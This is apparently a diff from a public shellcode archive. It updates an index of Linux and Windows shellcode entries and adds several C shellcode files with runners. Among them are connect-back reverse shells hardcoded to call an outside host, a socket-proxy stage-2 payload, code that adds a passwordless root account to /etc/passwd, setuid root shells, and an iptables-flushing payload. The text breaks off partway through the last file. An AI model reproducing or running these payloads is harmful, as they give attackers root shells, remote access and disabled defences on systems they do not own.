+43691,shellcodes/linux_x86/43691.c,"Linux/x86 - rmdir(_/tmp/willdeleted_) Shellcode (41 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
+43692,shellcodes/linux_x86/43692.c,"Linux/x86 - setdomainname(_th1s s3rv3r h4s b33n h1j4ck3d !!_) Shellcode (58 bytes)",2010-06-02,gunslinger_,shellcode,linux_x86
+43694,shellcodes/linux_x86/43694.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (26 bytes)",2018-01-14,"Hashim Jawad",shellcode,linux_x86
+43695,shellcodes/linux_x86/43695.c,"Linux/x86 - Force unmount /media/disk Shellcode (33 bytes)",2010-06-04,gunslinger_,shellcode,linux_x86
+43696,shellcodes/linux_x86/43696.c,"Linux/x86 - chmod(/etc/shadow_ 0666) + ASCII Shellcode (443 bytes)",2009-01-01,agix,shellcode,linux_x86
+43697,shellcodes/linux_x86/43697.c,"Linux/x86 - CDRom Ejecting + Polymorphic Shellcode (74 bytes)",2010-06-17,gunslinger_,shellcode,linux_x86
+43698,shellcodes/linux_x86/43698.c,"Linux/x86 - Bind TCP (31337/TCP) Shell + Polymorphic Shellcode (125 bytes)",2010-06-17,gunslinger_,shellcode,linux_x86
+43699,shellcodes/linux_x86/43699.c,"Linux/x86 - /sbin/iptables -POUTPUT DROP Shellcode (60 bytes)",2009-01-01,"John Babio",shellcode,linux_x86
+43700,shellcodes/linux_x86/43700.c,"Linux/x86 - /usr/bin/killall snort Shellcode (46 bytes)",2009-01-01,"John Babio",shellcode,linux_x86
+43701,shellcodes/linux_x86/43701.c,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (3)",2009-01-01,"John Babio",shellcode,linux_x86
+43702,shellcodes/linux_x86/43702.c,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (5)",2009-01-01,Kernel_Panik,shellcode,linux_x86
+43703,shellcodes/linux_x86/43703.c,"Linux/x86 - execve(/bin/dash) Shellcode (49 bytes)",2009-01-01,Chroniccommand,shellcode,linux_x86
+43704,shellcodes/linux_x86/43704.c,"Linux/x86 - execve(/bin/cat_ /etc/shadow_ NULL) Shellcode (42 bytes)",2009-01-01,antrhacks,shellcode,linux_x86
+43705,shellcodes/linux_x86/43705.c,"Linux/x86 - /etc/init.d/apparmor teardown Shellcode (53 bytes)",2009-01-01,"John Babio",shellcode,linux_x86
+43708,shellcodes/linux_x86/43708.c,"Linux/x86 - setreuid() + /sbin/iptables -F + exit(0) Shellcode (76 bytes)",2009-01-01,Sh3llc0d3,shellcode,linux_x86
+43709,shellcodes/linux_x86/43709.c,"Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)",2009-01-01,egeektronic,shellcode,linux_x86
+43711,shellcodes/linux_x86/43711.c,"Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)",2009-01-01,egeektronic,shellcode,linux_x86
+43712,shellcodes/linux_x86/43712.c,"Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)",2009-01-01,egeektronic,shellcode,linux_x86
+43714,shellcodes/linux_x86/43714.c,"Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)",2009-01-01,egeektronic,shellcode,linux_x86
+43716,shellcodes/linux_x86/43716.c,"Linux/x86 - execve(/bin/sh) Shellcode (28 bytes)",2009-01-01,"Jean Pascal Pereira",shellcode,linux_x86
+43707,shellcodes/linux_x86/43707.c,"Linux/x86 - mkdir(hacked) + exit() Shellcode (36 bytes)",2009-01-01,zillion,shellcode,linux_x86
+43719,shellcodes/linux_x86/43719.c,"Linux/x86 - Stager Reads Second Stage From STDIN Shellcode (14 bytes)",2009-01-01,_fkz,shellcode,linux_x86
+43721,shellcodes/linux_x86/43721.c,"Linux/x86 - iptables --flush Shellcode (43 bytes)",2009-01-01,"Hamza Megahed",shellcode,linux_x86
+43722,shellcodes/linux_x86/43722.c,"Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) (2)",2009-01-01,"Hamza Megahed",shellcode,linux_x86
+43725,shellcodes/linux_x86/43725.c,"Linux/x86 - Force Reboot Shellcode (36 bytes)",2009-01-01,"Hamza Megahed",shellcode,linux_x86
+43724,shellcodes/linux_x86/43724.c,"Linux/x86 - execve(chmod 0777 /etc/shadow) Shellcode (57 bytes)",2009-01-01,"Hamza Megahed",shellcode,linux_x86
+43726,shellcodes/linux_x86/43726.c,"Linux/x86 - Bind TCP (1111/TCP) Shell + SO_REUSEADDR Set (Avoiding SIGSEGV) Shellcode (103 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
+43727,shellcodes/linux_x86/43727.c,"Linux/x86 - Reverse TCP (127.1.1.1:55555/TCP) Shell Shellcode (72 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
+43728,shellcodes/linux_x86/43728.c,"Linux/x86 - Bind TCP (Random TCP Port) Shell Shellcode (65 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
+43729,shellcodes/linux_x86/43729.c,"Linux/x86 - Bind TCP (1111/TCP) Shell + GetPC/Call/Ret Method Shellcode (89 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
+43730,shellcodes/linux_x86/43730.c,"Linux/x86 - Bind TCP (1111/TCP) Shell Shellcode (73 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
+43731,shellcodes/linux_x86/43731.c,"Linux/x86 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
+43732,shellcodes/linux_x86/43732.c,"Linux/x86 - Egghunter Shellcode (38 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
 40549,shellcodes/windows_x86-64/40549.c,"Windows x64 - cmd.exe WinExec() Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
 40560,shellcodes/windows_x86/40560.asm,"Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)",2016-10-17,Fugu,shellcode,windows_x86
 40781,shellcodes/windows_x86-64/40781.c,"Windows x64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
@ -742,7 +795,7 @@ id,file,description,date,author,type,platform
 42295,shellcodes/linux_x86/42295.c,"Linux/x86 - Reverse TCP (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
 41723,shellcodes/linux_x86/41723.c,"Linux/x86 - Reverse TCP (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,linux_x86
 41750,shellcodes/linux_x86-64/41750.txt,"Linux/x86-64 - execve(/bin/sh) Shellcode (21 bytes)",2017-03-28,WangYihang,shellcode,linux_x86-64
-41757,shellcodes/linux_x86/41757.txt,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes)",2017-03-29,WangYihang,shellcode,linux_x86
+41757,shellcodes/linux_x86/41757.txt,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (4)",2017-03-29,WangYihang,shellcode,linux_x86
 41827,shellcodes/windows_x86-64/41827.txt,"Windows 10 x64 - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",shellcode,windows_x86-64
 41883,shellcodes/linux_x86-64/41883.txt,"Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (2)",2017-04-13,WangYihang,shellcode,linux_x86-64
 41909,shellcodes/linux_x86/41909.c,"Linux/x86 - Egghunter Shellcode (18 bytes)",2017-04-22,phackt_ul,shellcode,linux_x86
@ -765,4 +818,4 @@ id,file,description,date,author,type,platform
 42791,shellcodes/linux_x86-64/42791.c,"Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",shellcode,linux_x86-64
 42977,shellcodes/linux_x86/42977.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (30 bytes)",2017-10-12,"Manuel Mancera",shellcode,linux_x86
 42992,shellcodes/windows_x86-64/42992.c,"Windows x64 - API Hooking Shellcode (117 bytes)",2017-10-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
-43463,shellcodes/linux/43463.nasm,"Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes)",2018-01-04,"Hashim Jawad",shellcode,linux
+43463,shellcodes/linux_x86/43463.nasm,"Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes)",2018-01-04,"Hashim Jawad",shellcode,linux_x86
--- a/shellcodes/generator/43672.c
+++ b/shellcodes/generator/43672.c
@ -0,0 +1,69 @@
+/*---------------------------------------------------------------------------*
+ *                372 byte socket-proxy shellcode                            *
+ *              by Russell Sanford - xort@tty64.org                          *
+ *---------------------------------------------------------------------------*
+ *    filename: x86-linux-bounce-proxy.c                                     *
+ *        date: 12/23/2005                                                   *
+ *        info: Compiled with DTP Project.                                   *
+ * discription: This is a x86-linux proxy shellcode. This is probably best   *
+ * 	        used in stage 2 situations. The syntax for invoking the      *
+ * 	        patchcode is as follows:                                     *
+ *                                                                           *
+ * 		patchcode(shellcode,31337,"11.22.33.44",80);                 *
+ *                                                                           *
+ * 		Where 31337 is the port to listen to on the remote host      *
+ *---------------------------------------------------------------------------*/
+
+char shellcode[] =
+"\xe8\xff\xff\xff\xff\xc6\x4e\x5e\x81\xc6\x18\xfc\xff\xff\xeb\x48\x89\xc3\x6a\x03\x59\xb0\xdd\xcd"
+"\x80\x56\x89\xde\x80\xcc\x08\x6a\x04\x59\xb0\xdd\xcd\x80\x93\x5e\xc3\x89\xc2\x83\xe0\x1f\xc1\xea"
+"\x05\x8d\x8e\x78\xff\xff\xff\x0f\xab\x04\x91\xc3\x93\xb0\x03\x8d\x8e\x48\xf4\xff\xff\x66\xba\x01"
+"\x08\xcd\x80\xc3\x93\xb0\x04\x8d\x8e\x48\xf4\xff\xff\xcd\x80\xc3\x8d\xbe\xf8\xfe\xff\xff\x31\xc0"
+"\x31\xc9\x66\xb9\x01\x01\xf3\xaa\x31\xc0\x6a\x01\x5b\x50\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b"
+"\x5a\x68\x7e\xff\xfe\xff\x81\x04\x24\x01\x01\x01\x01\x68 xor\x81\x04\x24t@tt\x6a\x10\x51\x50\x89"
+"\xe1\xb0\x66\xcd\x80\xb3\x04\xb0\x66\xcd\x80\x5a\x50\x50\x52\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x89"
+"\x46\xfc\xe8\x5b\xff\xff\xff\xe8\x6f\xff\xff\xff\x31\xc0\x6a\x01\x5b\x50\x53\x6a\x02\x89\xe1\xb0"
+"\x66\xcd\x80\x5b\x43\x5f\x68y64.\x81\x04\x24org \x68need\x81\x04\x24 job\x6a\x10\x51\x50\x89\xe1"
+"\xb0\x66\xcd\x80\x58\x89\x46\xf8\xe8\x19\xff\xff\xff\xe8\x2d\xff\xff\xff\x8b\x5e\xfc\x8b\x4e\xf8"
+"\x6a\x01\x53\x51\x6a\x02\x51\x53\x39\xd9\x7e\x02\x89\xcb\x56\x43\x8d\x8e\x78\xff\xff\xff\x31\xd2"
+"\x31\xf6\x31\xff\xb0\x8e\xcd\x80\x5e\x58\x50\x89\xc2\x83\xe0\x1f\xc1\xea\x05\x8d\x8e\x78\xff\xff"
+"\xff\x0f\xa3\x04\x91\x73\x04\x59\x59\xeb\x32\x58\x50\xe8\xe5\xfe\xff\xff\x58\x31\xff\x47\x83\x7c"
+"\x24\x04\x02\x74\x02\xf7\xdf\x01\xf8\xe8\xe4\xfe\xff\xff\x39\xc0\x89\xc2\x58\x31\xff\x47\x83\x3c"
+"\x24\x02\x75\x02\xf7\xdf\x01\xf8\xe8\xdd\xfe\xff\xff\x59\xe2\xb1\xeb\x88";
+
+int find_safe_offset(int INT_A) {
+
+	int INT_B=0;
+	
+	do {
+		INT_A -= 0x01010101;	INT_B += 0x01010101;
+	}
+	while ( ((INT_A & 0x000000ff) == 0) || 
+		((INT_A & 0x0000ff00) == 0) || 
+		((INT_A & 0x00ff0000) == 0) ||
+		((INT_A & 0xff000000) == 0) );
+
+	return INT_B;
+}
+
+void patchcode(char *shellcode, int PORT_IN, char *IP, int PORT_OUT) {
+	
+	int PORT_IN_A = ((ntohs(PORT_IN) << 16) + 2);
+	int PORT_IN_B = find_safe_offset(PORT_IN_A);	
+
+	int IP_A = inet_addr(IP);
+	int IP_B = find_safe_offset(IP_A);
+
+	int PORT_OUT_A = ((ntohs(PORT_OUT) << 16) + 2);
+	int PORT_OUT_B = find_safe_offset(PORT_OUT_A);	
+
+	*(int *)&shellcode[134] = (PORT_IN_A - PORT_IN_B);
+	*(int *)&shellcode[141] = PORT_IN_B;
+
+	*(int *)&shellcode[205] = (IP_A - IP_B);
+	*(int *)&shellcode[212] = IP_B;
+	
+	*(int *)&shellcode[217] = (PORT_OUT_A - PORT_OUT_B);
+	*(int *)&shellcode[224] = PORT_OUT_B;
+
+}
--- a/shellcodes/linux_x86/14235.c
+++ b/shellcodes/linux_x86/14235.c
--- a/shellcodes/linux_x86/17371.txt
+++ b/shellcodes/linux_x86/17371.txt
--- a/shellcodes/linux_x86/43463.nasm
+++ b/shellcodes/linux_x86/43463.nasm
--- a/shellcodes/linux_x86/43666.c
+++ b/shellcodes/linux_x86/43666.c
@ -0,0 +1,31 @@
+Author: zillion
+EMail: zillion@safemode.org
+Home: http://www.safemode.org
+
+
+Linux x86 shellcode that does an execve of /bin/sh /tmp/p00p.
+
+
+File name: execve-tmp-p00p.c
+
+
+/*
+ * This shellcode will do /bin/sh /tmp/p00p ;-)
+ * Written by zillion@safemode.org
+ *
+ */
+
+char shellcode[]=
+        "\xeb\x21\x5e\x31\xc0\x88\x46\x07\x88\x46\x11\x89\x76\x12\x8d"
+        "\x5e\x08\x89\x5e\x16\x89\x46\x1a\xb0\x0b\x89\xf3\x8d\x4e\x12"
+        "\x8d\x56\x1a\xcd\x80\xe8\xda\xff\xff\xff\x2f\x62\x69\x6e\x2f"
+        "\x73\x68\x38\x2f\x74\x6d\x70\x2f\x70\x30\x30\x70\x32\x33\x34"
+        "\x35\x36\x37\x38\x39\x61\x62\x63\x64\x65";
+
+int main()
+{
+
+  int *ret;
+  ret = (int *)&ret + 2;
+  (*ret) = (int)shellcode;
+}
--- a/shellcodes/linux_x86/43668.c
+++ b/shellcodes/linux_x86/43668.c
@ -0,0 +1,23 @@
+/*
+ * Linux x86 shellcode by bob from Dtors.net.
+ * execve()/bin/ash; exit; 
+ * Total = 34 bytes.
+ */
+
+
+
+#include <stdio.h>
+
+char shellcode[]=
+		"\x31\xc0\x50\x68\x2f\x61\x73\x68\x68"
+		"\x2f\x62\x69\x6e\x89\xe3\x8d\x54\x24"
+		"\x08\x50\x53\x8d\x0c\x24\xb0\x0b\xcd"
+		"\x80\x31\xc0\xb0\x01\xcd\x80";
+int
+main()
+{
+        void (*dsr) ();
+        (long) dsr = &shellcode;
+        printf("Size: %d bytes.\n", sizeof(shellcode)); 
+        dsr();
+}
--- a/shellcodes/linux_x86/43669.c
+++ b/shellcodes/linux_x86/43669.c
@ -0,0 +1,24 @@
+/* Linux x86 shellcode, to open() write() close() and */
+/* exit(), adds a root user no-passwd to /etc/passwd */
+/* By bob from dtors.net */
+
+#include <stdio.h>
+
+char shellcode[]=
+		"\x31\xc0\x31\xdb\x31\xc9\x53\x68\x73\x73\x77"
+		"\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74"
+		"\x89\xe3\x66\xb9\x01\x04\xb0\x05\xcd\x80\x89"
+		"\xc3\x31\xc0\x31\xd2\x68\x6e\x2f\x73\x68\x68"
+		"\x2f\x2f\x62\x69\x68\x3a\x3a\x2f\x3a\x68\x3a"
+		"\x30\x3a\x30\x68\x62\x6f\x62\x3a\x89\xe1\xb2"
+		"\x14\xb0\x04\xcd\x80\x31\xc0\xb0\x06\xcd\x80"
+		"\x31\xc0\xb0\x01\xcd\x80";
+
+int
+main()
+{
+        void (*dsr) ();
+        (long) dsr = &shellcode;
+        printf("Size: %d bytes.\n", sizeof(shellcode)); 
+        dsr();
+}
--- a/shellcodes/linux_x86/43670.c
+++ b/shellcodes/linux_x86/43670.c
@ -0,0 +1,19 @@
+/* Linux x86 shellcode by bob */
+/* setuid(); execve(); exit(); */
+
+#include <stdio.h>
+
+char shellcode[]=
+		"\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80"
+		"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f"
+		"\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50"
+		"\x53\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0"
+		"\xb0\x01\xcd\x80";
+int
+main()
+{
+        void (*dsr) ();
+        (long) dsr = &shellcode;
+        printf("Size: %d bytes.\n", sizeof(shellcode)); 
+        dsr();
+}
--- a/shellcodes/linux_x86/43671.c
+++ b/shellcodes/linux_x86/43671.c
@ -0,0 +1,22 @@
+/*
+ * Linux x86 shellcode by bob from Dtors.net.
+ * chmod("//bin/sh" ,04775); set sh +s
+ */
+
+
+
+#include <stdio.h>
+
+char shellcode[]=
+		"\x31\xc0\x31\xdb\x31\xc9\x53\x68\x6e"
+		"\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89"
+		"\xe3\x66\xb9\xfd\x09\xb0\x0f\xcd\x80"
+		"\xb0\x01\xcd\x80";
+int
+main()
+{
+        void (*dsr) ();
+        (long) dsr = &shellcode;
+        printf("Size: %d bytes.\n", sizeof(shellcode)); 
+        dsr();
+}
--- a/shellcodes/linux_x86/43673.c
+++ b/shellcodes/linux_x86/43673.c
@ -0,0 +1,57 @@
+/* linux x86 shellcode(41 bytes) by sacrine of Netric (www.netric.org)
+ * setresuid(0,0,0); execve /bin/sh; exit;
+ *
+
+        __asm(" xorl %eax,%eax
+                xorl %ebx,%ebx
+                xorl %ecx,%ecx
+                cdq
+                movb $0xa4, %al
+                int $0x80
+
+                xorl %eax,%eax
+                push %eax
+                pushl   $0x68732f2f
+                pushl   $0x6e69622f
+                mov %esp, %ebx
+                push %eax
+                push %ebx
+                lea (%esp,1),%ecx
+                movb $0xb, %al
+                int $0x80
+
+                xorl %eax,%eax
+                mov  $0x1, %al
+                int $0x80
+"); 
+
+*/
+
+char main[]=
+        // setresuid(0,0,0);
+
+        "\x31\xc0"              // xor  %eax,%eax
+        "\x31\xdb"              // xor  %ebx,%ebx
+        "\x31\xc9"              // xor  %ecx,%ecx
+        "\x99"                  // cdq
+        "\xb0\xa4"              // mov  $0xa4, %al
+        "\xcd\x80"              // int  $0x80
+
+        // execve /bin/sh
+
+        "\x31\xc0"                      // xor    %eax,%eax
+        "\x50"                          // push   %eax
+        "\x68\x2f\x2f\x73\x68"          // push   $0x68732f2f
+        "\x68\x2f\x62\x69\x6e"          // push   $0x6e69622f
+        "\x89\xe3"                      // mov    %esp,%ebx
+        "\x50"                          // push   %eax
+        "\x53"                          // push   %ebx
+        "\x8d\x0c\x24"                  // lea    (%esp,1),%ecx
+        "\xb0\x0b"                      // mov    $0xb,%al
+        "\xcd\x80"                      // int    $0x80
+
+        // exit
+
+        "\x31\xc0"              // xorl %eax,%eax
+        "\xb0\x01"              // movb $0x1, %al
+        "\xcd\x80";             // int  $0x80
--- a/shellcodes/linux_x86/43674.c
+++ b/shellcodes/linux_x86/43674.c
@ -0,0 +1,154 @@
+/* linux x86 shellcode by eSDee of Netric (www.netric.org)
+ * 131 byte - connect back shellcode (port=0xb0ef)
+ */     
+
+#include <stdio.h>
+
+char
+shellcode[] = 
+        "\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
+        "\x06\x51\xb1\x01\x51\xb1\x02\x51"
+        "\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
+        "\x89\xc2\x31\xc0\x31\xc9\x51\x51"
+        "\x68\x41\x42\x43\x44\x66\x68\xb0"
+        "\xef\xb1\x02\x66\x51\x89\xe7\xb3"
+        "\x10\x53\x57\x52\x89\xe1\xb3\x03"
+        "\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
+        "\x74\x06\x31\xc0\xb0\x01\xcd\x80"
+        "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
+        "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01"
+        "\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
+        "\xb1\x02\xcd\x80\x31\xc0\x31\xd2"
+        "\x50\x68\x6e\x2f\x73\x68\x68\x2f"
+        "\x2f\x62\x69\x89\xe3\x50\x53\x89"
+        "\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
+        "\x01\xcd\x80";
+
+int
+c_code()
+{
+        char *argv[2];
+        char *sockaddr = "\x02\x00"             //  Address family
+                         "\xef\xb0"             //  port
+                         "\x00\x00\x00\x00"     //  sin_addr
+                         "\x00\x00\x00\x00"
+                         "\x00\x00\x00\x00";
+
+        int sock;
+
+        sock = socket(2, 1, 6);
+        if (connect(sock, sockaddr, 16) < 0) exit();
+
+        dup2(sock, 0);
+        dup2(sock, 1);
+        dup2(sock, 2);
+
+        argv[0] = "//bin/sh";
+        argv[1] = NULL;
+
+        execve(argv[0], &argv[0], NULL);
+        exit();
+}
+
+int
+asm_code()
+{
+        __asm(" # sock = socket(2, 1, 6);
+                xorl    %eax,   %eax
+                xorl    %ebx,   %ebx
+                xorl    %ecx,   %ecx
+                pushl   %ecx
+                movb    $6,     %cl             # IPPROTO_TCP
+                pushl   %ecx
+                movb    $1,     %cl             # SOCK_STREAM
+                pushl   %ecx
+                movb    $2,     %cl             # AF_INET
+                pushl   %ecx
+                movl    %esp,   %ecx
+                movb    $1,     %bl             # SYS_SOCKET
+                movb    $102,   %al             # SYS_socketcall
+                int     $0x80
+
+                # connect(sock, sockaddr, 16)
+                movl    %eax,   %edx
+                xorl    %eax,   %eax
+                xorl    %ecx,   %ecx
+                pushl   %ecx
+                pushl   %ecx
+                pushl   $0x44434241             # ip address
+                pushw   $0xefb0                 # port
+                movb    $0x02,  %cl             # address family
+                pushw   %cx
+                movl    %esp,   %edi
+                movb    $16,    %bl             # sizeof(sockaddr)
+                pushl   %ebx
+                pushl   %edi
+                pushl   %edx                    # sock
+                movl    %esp,   %ecx
+                movb    $3,     %bl             # SYS_CONNECT
+                movb    $102,   %al             # SYS_socketcall
+                int     $0x80           
+                xorl    %ecx,   %ecx
+                cmpl    %eax,   %ecx
+                je CONNECTED
+
+                # exit()
+                xorl    %eax,   %eax
+                movb    $1,     %al             # SYS_exit
+                int     $0x80
+
+                CONNECTED:
+                # dup2(sock, 0);
+                xorl    %eax,   %eax
+                movb    $63,    %al             # SYS_dup2
+                movl    %edx,   %ebx            # sock
+                int     $0x80
+
+                # dup2(sock, 1);
+                xorl    %eax,   %eax
+                movb    $63,    %al             # SYS_dup2
+                movl    %edx,   %ebx            # sock
+                movb    $1,     %cl             # stdout
+                int     $0x80
+
+                # dup2(sock, 2);
+                xorl    %eax,   %eax
+                movb    $63,    %al             # SYS_dup2
+                movl    %edx,   %ebx            # sock
+                movb    $2,     %cl             # stderr
+                int     $0x80
+
+                # execve(argv[0], &argv[0], NULL);
+                xorl    %eax,   %eax
+                xorl    %edx,   %edx
+                pushl   %eax
+                pushl   $0x68732f6e             # the string
+                pushl   $0x69622f2f             # //bin/sh
+                movl    %esp,   %ebx
+                pushl   %eax
+                pushl   %ebx
+                movl    %esp,   %ecx
+                movb    $11,    %al             # SYS_execve
+                int     $0x80
+
+                # exit()
+                xorl    %eax,   %eax
+                movb    $1,     %al             # SYS_exit
+                int     $0x80
+                ");
+}
+
+int
+main()
+{
+        void (*funct)();
+
+        shellcode[33] = 81;     /* ip of www.netric.org :) */
+        shellcode[34] = 17;
+        shellcode[35] = 46;
+        shellcode[36] = 156;
+
+        (long) funct = &shellcode; 
+        funct();        
+        return 0;
+}
--- a/shellcodes/linux_x86/43675.c
+++ b/shellcodes/linux_x86/43675.c
@ -0,0 +1,154 @@
+/* linux x86 shellcode by eSDee of Netric (www.netric.org)
+ * 131 byte - connect back shellcode (port=0xb0ef)
+ */     
+
+#include <stdio.h>
+
+char
+shellcode[] = 
+        "\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
+        "\x06\x51\xb1\x01\x51\xb1\x02\x51"
+        "\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
+        "\x89\xc2\x31\xc0\x31\xc9\x51\x51"
+        "\x68\x41\x42\x43\x44\x66\x68\xb0"
+        "\xef\xb1\x02\x66\x51\x89\xe7\xb3"
+        "\x10\x53\x57\x52\x89\xe1\xb3\x03"
+        "\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
+        "\x74\x06\x31\xc0\xb0\x01\xcd\x80"
+        "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
+        "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01"
+        "\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
+        "\xb1\x02\xcd\x80\x31\xc0\x31\xd2"
+        "\x50\x68\x6e\x2f\x73\x68\x68\x2f"
+        "\x2f\x62\x69\x89\xe3\x50\x53\x89"
+        "\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
+        "\x01\xcd\x80";
+
+int
+c_code()
+{
+        char *argv[2];
+        char *sockaddr = "\x02\x00"             //  Address family
+                         "\xef\xb0"             //  port
+                         "\x00\x00\x00\x00"     //  sin_addr
+                         "\x00\x00\x00\x00"
+                         "\x00\x00\x00\x00";
+
+        int sock;
+
+        sock = socket(2, 1, 6);
+        if (connect(sock, sockaddr, 16) < 0) exit();
+
+        dup2(sock, 0);
+        dup2(sock, 1);
+        dup2(sock, 2);
+
+        argv[0] = "//bin/sh";
+        argv[1] = NULL;
+
+        execve(argv[0], &argv[0], NULL);
+        exit();
+}
+
+int
+asm_code()
+{
+        __asm(" # sock = socket(2, 1, 6);
+                xorl    %eax,   %eax
+                xorl    %ebx,   %ebx
+                xorl    %ecx,   %ecx
+                pushl   %ecx
+                movb    $6,     %cl             # IPPROTO_TCP
+                pushl   %ecx
+                movb    $1,     %cl             # SOCK_STREAM
+                pushl   %ecx
+                movb    $2,     %cl             # AF_INET
+                pushl   %ecx
+                movl    %esp,   %ecx
+                movb    $1,     %bl             # SYS_SOCKET
+                movb    $102,   %al             # SYS_socketcall
+                int     $0x80
+
+                # connect(sock, sockaddr, 16)
+                movl    %eax,   %edx
+                xorl    %eax,   %eax
+                xorl    %ecx,   %ecx
+                pushl   %ecx
+                pushl   %ecx
+                pushl   $0x44434241             # ip address
+                pushw   $0xefb0                 # port
+                movb    $0x02,  %cl             # address family
+                pushw   %cx
+                movl    %esp,   %edi
+                movb    $16,    %bl             # sizeof(sockaddr)
+                pushl   %ebx
+                pushl   %edi
+                pushl   %edx                    # sock
+                movl    %esp,   %ecx
+                movb    $3,     %bl             # SYS_CONNECT
+                movb    $102,   %al             # SYS_socketcall
+                int     $0x80           
+                xorl    %ecx,   %ecx
+                cmpl    %eax,   %ecx
+                je CONNECTED
+
+                # exit()
+                xorl    %eax,   %eax
+                movb    $1,     %al             # SYS_exit
+                int     $0x80
+
+                CONNECTED:
+                # dup2(sock, 0);
+                xorl    %eax,   %eax
+                movb    $63,    %al             # SYS_dup2
+                movl    %edx,   %ebx            # sock
+                int     $0x80
+
+                # dup2(sock, 1);
+                xorl    %eax,   %eax
+                movb    $63,    %al             # SYS_dup2
+                movl    %edx,   %ebx            # sock
+                movb    $1,     %cl             # stdout
+                int     $0x80
+
+                # dup2(sock, 2);
+                xorl    %eax,   %eax
+                movb    $63,    %al             # SYS_dup2
+                movl    %edx,   %ebx            # sock
+                movb    $2,     %cl             # stderr
+                int     $0x80
+
+                # execve(argv[0], &argv[0], NULL);
+                xorl    %eax,   %eax
+                xorl    %edx,   %edx
+                pushl   %eax
+                pushl   $0x68732f6e             # the string
+                pushl   $0x69622f2f             # //bin/sh
+                movl    %esp,   %ebx
+                pushl   %eax
+                pushl   %ebx
+                movl    %esp,   %ecx
+                movb    $11,    %al             # SYS_execve
+                int     $0x80
+
+                # exit()
+                xorl    %eax,   %eax
+                movb    $1,     %al             # SYS_exit
+                int     $0x80
+                ");
+}
+
+int
+main()
+{
+        void (*funct)();
+
+        shellcode[33] = 81;     /* ip of www.netric.org :) */
+        shellcode[34] = 17;
+        shellcode[35] = 46;
+        shellcode[36] = 156;
+
+        (long) funct = &shellcode; 
+        funct();        
+        return 0;
+}
--- a/shellcodes/linux_x86/43677.c
+++ b/shellcodes/linux_x86/43677.c
@ -0,0 +1,57 @@
+/* linux x86 shellcode by eSDee of Netric (www.netric.org)
+ * /sbin/iptables --flush
+ */
+
+char
+main[] =
+        "\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
+        "\x39\xd8\x75\x2d\x31\xc0\x50\x66"
+        "\x68\x2d\x46\x89\xe6\x50\x68\x62"
+        "\x6c\x65\x73\x68\x69\x70\x74\x61"
+        "\x68\x62\x69\x6e\x2f\x68\x2f\x2f"
+        "\x2f\x73\x89\xe3\x8d\x54\x24\x10"
+        "\x50\x56\x54\x89\xe1\xb0\x0b\xcd"
+        "\x80\x89\xc3\x31\xc0\x31\xc9\x31"
+        "\xd2\xb0\x07\xcd\x80"; 
+
+        /* your evil shellcode here */
+
+int 
+asm_code()
+{
+        __asm("
+                xorl %eax,%eax
+                xorl %ebx,%ebx
+                movb $2, %al
+                int $0x080
+                cmpl %ebx,%eax
+                jne WAIT
+
